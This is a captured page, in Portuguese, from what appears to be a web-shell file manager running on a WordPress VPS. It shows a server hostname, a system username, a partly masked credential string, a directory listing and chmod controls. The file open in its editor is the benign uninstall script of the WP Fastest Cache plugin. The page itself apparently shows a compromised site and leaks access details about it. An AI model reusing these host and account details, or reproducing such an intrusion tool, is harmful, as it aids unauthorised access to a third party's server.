🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_292bfa1f / 82f5****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: uninstall.php
<?php /** * Runs on Uninstall of WP Fastest Cache * * @package WP Fastest Cache * @author Emre Vona * @license GPL-2.0+ * @link http://wordpress.org/plugins/wp-fastest-cache/ */ // if uninstall.php is not called by WordPress, die if(!defined('WP_UNINSTALL_PLUGIN')){ die; } include_once("wpFastestCache.php"); wpfastestcache_deactivate(); delete_option("WpFastestCache"); delete_option("WpFcDeleteCacheLogs"); delete_option("WpFastestCacheCDN"); delete_option("WpFastestCacheCSP"); delete_option("WpFastestCacheExclude"); delete_option("WpFastestCachePreLoad"); delete_option("WpFastestCacheCSS"); delete_option("WpFastestCacheCSSSIZE"); delete_option("WpFastestCacheJS"); delete_option("WpFastestCacheJSSIZE"); delete_option("WpFastestCacheXML"); delete_option("WpFastestCacheXMLSIZE"); delete_option("WpFastestCacheSVG"); delete_option("WpFastestCacheSVGSIZE"); delete_option("WpFastestCacheJSON"); delete_option("WpFastestCacheJSONSIZE"); delete_option("WpFastestCacheVarnish"); delete_option("WpFastestCacheWOFF"); delete_option("WpFastestCacheWOFFSIZE"); delete_option("WpFastestCacheToolbarSettings"); delete_option("wpfc_server_location"); delete_option("WpFcServerUrl"); delete_option("WpFcLastImageId"); delete_option("WpFcImgOptNonce"); delete_option("wpfc-group"); delete_option("WpFc_credit"); delete_option("WpFc_api_key"); delete_transient("wpfc_premium_update_info"); delete_option("wpfc_premium_update_info"); wp_clear_scheduled_hook("wpfc_db_auto_cleanup"); foreach ((array)_get_cron_array() as $cron_key => $cron_value) { foreach ( (array) $cron_value as $hook => $events ) { if(preg_match("/^wp\_fastest\_cache/", $hook)){ $args = array(); foreach ( (array) $events as $event_key => $event ) { if(isset($event["args"]) && isset($event["args"][0])){ $args = array(json_encode(json_decode($event["args"][0]))); } } wp_clear_scheduled_hook($hook, $args); } } } ?>
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar